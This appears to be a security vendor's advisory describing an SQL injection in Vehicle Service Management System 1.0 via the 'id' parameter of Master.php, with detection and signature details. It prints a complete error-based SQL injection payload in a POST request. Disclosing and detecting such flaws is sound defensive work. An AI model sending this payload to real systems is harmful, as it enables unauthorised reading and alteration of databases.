top of page

Vehicle Service Management System 1.0 SQL Injection



Application Details

Vehicle Service Management System is a web based application for a vehicle repair/service shop or business. Providing an online platform for current and potential clients to submit their service requests.


Vulnerability

Vehicle Service Management System is vulnerable to SQL injection.


Identification

A remote attacker could send specially crafted SQL statements to the Master.php script using the 'id' parameter, which could allow the attacker to view, add, modify or delete information in the back-end database.


POST /vehicle_service/classes/Master.php?f=save_request
PAYLOAD - id=1' AND (SELECT 8850 FROM(SELECT COUNT(*),CONCAT(0x716a706b71,(SELECT (ELT(8850=8850,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- bdrq&category_id=2&owner_name=aa&contact=aa&email=aaaa@a.com&address=aaaaaaaaa&vehicle_name=aaaa&vehicle_registration_number=aaaa&vehicle_model=aaaa&service_id[]=3&service_type=Pick Up&pickup_address=aa


Detection

By turning this into a traffic file and matching rule, we are able to detect attempts to influence the vulnerable parameter with SQL injections.


Coverage

Idappcom has created signature 8021881 along with a traffic file.


References

Vehicle Service Management System 1.0 SQL Injection - Packet Storm Security


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional

bottom of page